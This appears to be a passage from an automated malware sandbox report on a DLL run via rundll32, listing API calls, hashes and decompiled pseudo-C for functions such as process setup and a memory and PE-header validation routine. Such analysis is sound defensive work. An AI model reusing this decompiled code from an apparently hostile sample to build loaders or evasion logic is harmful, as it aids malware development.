                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F19
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F2F
                      • Part of subcall function 6FFA16E7: memcpy.NTDLL(00000000,00000002,6FFA124C,?,?,?,?,?,6FFA124C,?,?,?,?,?,?,00000002), ref: 6FFA1714
                      • Part of subcall function 6FFA16E7: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6FFA1747
                      • Part of subcall function 6FFA1A0A: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6FFA1A42
                      • Part of subcall function 6FFA2042: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6FFA207B
                      • Part of subcall function 6FFA2042: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6FFA20F0
                      • Part of subcall function 6FFA2042: GetLastError.KERNEL32 ref: 6FFA20F6
                    • GetLastError.KERNEL32(?,?), ref: 6FFA1280
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                    • String ID:
                    • API String ID: 2673762927-0
                    • Opcode ID: 24c1575d3204ea293ead73cd038b4b82e7089870eff406b62c4f79eef0a23b88
                    • Instruction ID: 196eb2df3c12afac84ea10ad2f8a8968730fc1fcb940841399367dd2ddfa3a12
                    • Opcode Fuzzy Hash: 24c1575d3204ea293ead73cd038b4b82e7089870eff406b62c4f79eef0a23b88
                    • Instruction Fuzzy Hash: ED11EE36600711EBD7119BE9CC80D9F77FCAF893187054659EA01D7644EBA2FD058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 7001234F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(?,2000000B,7001266D,00000002,00000000,?,?,?,7001266D,?,00000000), ref: 700123E8
                    • GetLocaleInfoW.KERNEL32(?,20001004,7001266D,00000002,00000000,?,?,?,7001266D,?,00000000), ref: 70012411
                    • GetACP.KERNEL32(?,?,7001266D,?,00000000), ref: 70012426
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: 222cf211ab6e4f59172543003c9ad823cb35cebb1cd6767bca9e3f833151cc7d
                    • Instruction ID: 1ea6d55796e5fd4c9110b8ff33f99f9e85545a53e33833e974d3fe8613c80660
                    • Opcode Fuzzy Hash: 222cf211ab6e4f59172543003c9ad823cb35cebb1cd6767bca9e3f833151cc7d
                    • Instruction Fuzzy Hash: A4218C22600102EBEB268F75C905B8F72F7AB45E74B628528E90BD7214E732DEE1C750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70011BC3 Relevance: 7.8, APIs: 5, Instructions: 251COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • GetACP.KERNEL32(?,?,?,?,?,?,7000AE13,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 70011C84
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7000AE13,?,?,?,00000055,?,-00000050,?,?), ref: 70011CAF
                    • _wcschr.LIBVCRUNTIME ref: 70011D43
                    • _wcschr.LIBVCRUNTIME ref: 70011D51
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 70011E12
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                    • String ID:
                    • API String ID: 4147378913-0
                    • Opcode ID: 24d8ab03308cab575913fa02e30d44572347ae21d9f5548f19c45d098f8244f8
                    • Instruction ID: 68fc3afeff8be51856747fc2f34452e622bd9ac055b3706cb17d0a6e750917dc
                    • Opcode Fuzzy Hash: 24d8ab03308cab575913fa02e30d44572347ae21d9f5548f19c45d098f8244f8
                    • Instruction Fuzzy Hash: CE71B371A40603AEE7199B75DC46BEE73FAEF45F30F104529F9069B281FB70E9808691
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70012524 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                      • Part of subcall function 700096C6: _free.LIBCMT ref: 70009728
                      • Part of subcall function 700096C6: _free.LIBCMT ref: 7000975E
                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 70012630
                    • IsValidCodePage.KERNEL32(00000000), ref: 70012679
                    • IsValidLocale.KERNEL32(?,00000001), ref: 70012688
                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 700126D0
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 700126EF
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                    • String ID:
                    • API String ID: 949163717-0
                    • Opcode ID: 0001fb0407ca36f4ad270574a8e62b6cf9586a7db2445356f2adae6ff00dc05d
                    • Instruction ID: d8fe3ed3063dd71dfd38ffa76e50a5891f5f63c61dbc82f482b95d0710331d48
                    • Opcode Fuzzy Hash: 0001fb0407ca36f4ad270574a8e62b6cf9586a7db2445356f2adae6ff00dc05d
                    • Instruction Fuzzy Hash: 2F516172900207EFEB01DFB5CC45AAE77FABF44B20F104569F906E7191EB70A9908B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1F7C Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E6FFA1F7C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6ffa41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6ffa41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6ffa41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6ffa41a8 = _t5;
					 *0x6ffa41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6ffa41a4 = _t6;
					if(_t6 == 0) {
						 *0x6ffa41a4 =  *0x6ffa41a4 | 0xffffffff;
					}
					return 0;
				}
			}









                    0x6ffa1f7d
                    0x6ffa1f8b
                    0x6ffa1f93
                    0x6ffa1f98
                    0x6ffa1fe2
                    0x6ffa1fe2
                    0x6ffa1f9a
                    0x6ffa1fa2
                    0x6ffa1fde
                    0x6ffa1fe0
                    0x6ffa1fa4
                    0x6ffa1fa4
                    0x6ffa1fa9
                    0x6ffa1fb7
                    0x6ffa1fbc
                    0x6ffa1fc2
                    0x6ffa1fca
                    0x6ffa1fcf
                    0x6ffa1fd1
                    0x6ffa1fd1
                    0x6ffa1fdb
                    0x6ffa1fdb

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6FFA1512,747863F0,00000000), ref: 6FFA1F8B
                    • GetVersion.KERNEL32 ref: 6FFA1F9A
                    • GetCurrentProcessId.KERNEL32 ref: 6FFA1FA9
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6FFA1FC2
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentEventOpenVersion
                    • String ID:
                    • API String ID: 845504543-0
                    • Opcode ID: f75383ad0ee4cad4f2c28c62a0fb2aa7927655e13a88a3290d7e2395cd125f6b
                    • Instruction ID: 9904a9461af0e5c581acab54cfc04e3312f40dc2846576eb079fb72cdc79beec
                    • Opcode Fuzzy Hash: f75383ad0ee4cad4f2c28c62a0fb2aa7927655e13a88a3290d7e2395cd125f6b
                    • Instruction Fuzzy Hash: 0CF06D30674A10EEEF528F79A80674E3BA4BB06735F11802AE104C91F0DB7160628F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70001E38 Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,70001F57,7003A428,00000017), ref: 70001E3D
                    • UnhandledExceptionFilter.KERNEL32(7003A428,?,70001F57,7003A428,00000017), ref: 70001E46
                    • GetCurrentProcess.KERNEL32(C0000409,?,70001F57,7003A428,00000017), ref: 70001E51
                    • TerminateProcess.KERNEL32(00000000,?,70001F57,7003A428,00000017), ref: 70001E58
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                    • String ID:
                    • API String ID: 3231755760-0
                    • Opcode ID: a8d69f8530dd941252ee70cb9a2aef17590eb87818fd953dc124a397627950a7
                    • Instruction ID: 25ded8572a309eea30834ec77e24b681c411e02256230d880852ca5679be4ed3
                    • Opcode Fuzzy Hash: a8d69f8530dd941252ee70cb9a2aef17590eb87818fd953dc124a397627950a7
                    • Instruction Fuzzy Hash: 4BD0C973044208BFE7006BEACC0CB4E3A38AB04222F108000F70D83221CAB158008B51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70006707 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 700067FF
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 70006809
                    • UnhandledExceptionFilter.KERNEL32(6FFFC512), ref: 70006816
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: e4fc9918fa1b4a93b33fafc0f6919f825b30ec5566b7add03a4b0523e13ce428
                    • Instruction ID: 26ac8e7fc63e71e0e8db6d039e6cf2442a65972a4a83329f1bb3cf0833ede474
                    • Opcode Fuzzy Hash: e4fc9918fa1b4a93b33fafc0f6919f825b30ec5566b7add03a4b0523e13ce428
                    • Instruction Fuzzy Hash: 1331C575901228AFDB21DF68DD8978DBBB9BF08720F5041EAE40DA7251EB709F818F45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA11BF Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E6FFA11BF(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





                    0x6ffa11c3
                    0x6ffa11d4
                    0x6ffa11dc
                    0x6ffa11de
                    0x6ffa11f1
                    0x6ffa11f1
                    0x6ffa11fb

                    APIs
                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6FFA19A8,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA11D4
                    • GetSystemDefaultUILanguage.KERNEL32(?,?,6FFA19A8,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA11DE
                    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6FFA19A8,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA11F1
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Language$DefaultInfoLocaleNameSystem
                    • String ID:
                    • API String ID: 3724080410-0
                    • Opcode ID: b6f013ad36564c74b4e225b97c1a2090636234b599bb3a346d0551b09d3418e6
                    • Instruction ID: eb50012319d66fe7e054bfc2fa353ec0cd29dd6aff7ca0ed5f51734f967a0a9d
                    • Opcode Fuzzy Hash: b6f013ad36564c74b4e225b97c1a2090636234b599bb3a346d0551b09d3418e6
                    • Instruction Fuzzy Hash: D2E04F74650248F6EB00D7A18D07FBE72BCAB0175AF500045FB01E61D0D6B59E14EB39
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 700081A6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,700081A5,70045B10,?,?,70045B10,?,7000053E), ref: 700081C8
                    • TerminateProcess.KERNEL32(00000000,?,700081A5,70045B10,?,?,70045B10,?,7000053E), ref: 700081CF
                    • ExitProcess.KERNEL32 ref: 700081E1
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 0b7d99e23d04daa5390f84ae4619fd1ae1f8ed92d482cb271a533715872201d5
                    • Instruction ID: 5dbc7719206ec216fef743e7f18790514eada7b86c94fe8d43dd5fd028c62111
                    • Opcode Fuzzy Hash: 0b7d99e23d04daa5390f84ae4619fd1ae1f8ed92d482cb271a533715872201d5
                    • Instruction Fuzzy Hash: 63E0B632000648BFEB02AF59CC0DA8E3B7AFF40A71B108414F94A87231CB75ED82CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7000CA4A Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,7000CA45,?,?,?,?,?,?,00000000), ref: 7000CC77
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: d0648db9ea43100c0ede80a699b09f6878dd11292bfebb7c739f28af452d8c76
                    • Instruction ID: 5a753270751a014ca4481ecc468326e0db649e76234c9ac31a24c05dc5d03d27
                    • Opcode Fuzzy Hash: d0648db9ea43100c0ede80a699b09f6878dd11292bfebb7c739f28af452d8c76
                    • Instruction Fuzzy Hash: F9B114322106099FE715CF28C486E997BF6FF45764F25865DE89ACF2A1C335E982CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA2495 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E6FFA2495(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6ffa41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6ffa4240 = 1;
										__eflags =  *0x6ffa4240;
										if( *0x6ffa4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6ffa41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6ffa4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6ffa41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6ffa4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6ffa41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6ffa4240 = 1;
							__eflags =  *0x6ffa4240;
							if( *0x6ffa4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6ffa4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6ffa4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6ffa41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                    0x6ffa249f
                    0x6ffa24a2
                    0x6ffa24a8
                    0x6ffa24c6
                    0x00000000
                    0x6ffa24c6
                    0x6ffa24b0
                    0x6ffa24b9
                    0x6ffa24bf
                    0x6ffa24ce
                    0x6ffa24d1
                    0x6ffa24d4
                    0x6ffa24de
                    0x6ffa24de
                    0x6ffa24e0
                    0x6ffa24e3
                    0x6ffa24e5
                    0x6ffa24e5
                    0x6ffa24e7
                    0x6ffa24ea
                    0x00000000
                    0x00000000
                    0x6ffa24ec
                    0x6ffa24ee
                    0x6ffa2554
                    0x6ffa2554
                    0x6ffa26b2
                    0x00000000
                    0x6ffa26b2
                    0x6ffa24f0
                    0x6ffa24f0
                    0x6ffa24f4
                    0x6ffa24f6
                    0x6ffa24f6
                    0x6ffa24f6
                    0x6ffa24f6
                    0x6ffa24f9
                    0x6ffa24fa
                    0x6ffa24fd
                    0x6ffa24fd
                    0x6ffa2501
                    0x6ffa2505
                    0x6ffa2513
                    0x6ffa2513
                    0x6ffa251b
                    0x6ffa2521
                    0x6ffa2523
                    0x6ffa2525
                    0x6ffa2535
                    0x6ffa2542
                    0x6ffa2546
                    0x6ffa254b
                    0x6ffa254d
                    0x6ffa25cb
                    0x6ffa25cb
                    0x6ffa254f
                    0x6ffa254f
                    0x6ffa254f
                    0x6ffa25cd
                    0x6ffa25cf
                    0x6ffa26b0
                    0x6ffa26b0
                    0x00000000
                    0x6ffa25d5
                    0x6ffa25d5
                    0x6ffa25dc
                    0x00000000
                    0x00000000
                    0x6ffa25e2
                    0x6ffa25e6
                    0x6ffa2642
                    0x6ffa2644
                    0x6ffa264c
                    0x6ffa264e
                    0x6ffa2650
                    0x00000000
                    0x00000000
                    0x6ffa2652
                    0x6ffa2658
                    0x6ffa265a
                    0x6ffa265c
                    0x6ffa2671
                    0x6ffa2671
                    0x6ffa2673
                    0x6ffa26a2
                    0x6ffa26a9
                    0x00000000
                    0x6ffa26a9
                    0x6ffa2677
                    0x6ffa2678
                    0x6ffa267a
                    0x6ffa267c
                    0x6ffa267c
                    0x6ffa267e
                    0x6ffa2680
                    0x6ffa2682
                    0x6ffa2696
                    0x6ffa2696
                    0x6ffa2699
                    0x6ffa269b
                    0x6ffa269b
                    0x6ffa269c
                    0x6ffa269c
                    0x00000000
                    0x6ffa2684
                    0x6ffa2684
                    0x6ffa2684
                    0x6ffa268d
                    0x6ffa268e
                    0x6ffa2690
                    0x6ffa2692
                    0x6ffa2692
                    0x00000000
                    0x6ffa2684
                    0x6ffa2682
                    0x6ffa265e
                    0x6ffa2665
                    0x6ffa2665
                    0x6ffa2667
                    0x00000000
                    0x00000000
                    0x6ffa2669
                    0x6ffa266a
                    0x6ffa266d
                    0x6ffa266f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa266f
                    0x00000000
                    0x6ffa2665
                    0x6ffa25e8
                    0x6ffa25eb
                    0x6ffa25f0
                    0x00000000
                    0x00000000
                    0x6ffa25f9
                    0x6ffa25fb
                    0x6ffa2601
                    0x00000000
                    0x00000000
                    0x6ffa2607
                    0x6ffa260d
                    0x00000000
                    0x00000000
                    0x6ffa2613
                    0x6ffa2615
                    0x6ffa261e
                    0x6ffa2622
                    0x00000000
                    0x00000000
                    0x6ffa2628
                    0x6ffa262b
                    0x6ffa262d
                    0x00000000
                    0x00000000
                    0x6ffa2634
                    0x6ffa2636
                    0x00000000
                    0x00000000
                    0x6ffa2638
                    0x6ffa263c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa263c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa2527
                    0x6ffa2527
                    0x6ffa2527
                    0x6ffa252e
                    0x00000000
                    0x00000000
                    0x6ffa2530
                    0x6ffa2531
                    0x6ffa2533
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa2533
                    0x6ffa255b
                    0x6ffa255d
                    0x00000000
                    0x00000000
                    0x6ffa256d
                    0x6ffa256f
                    0x6ffa2571
                    0x00000000
                    0x00000000
                    0x6ffa2577
                    0x6ffa257e
                    0x6ffa25aa
                    0x6ffa25aa
                    0x6ffa25ac
                    0x6ffa25ae
                    0x6ffa25c2
                    0x6ffa25c4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa25b0
                    0x6ffa25b0
                    0x6ffa25b0
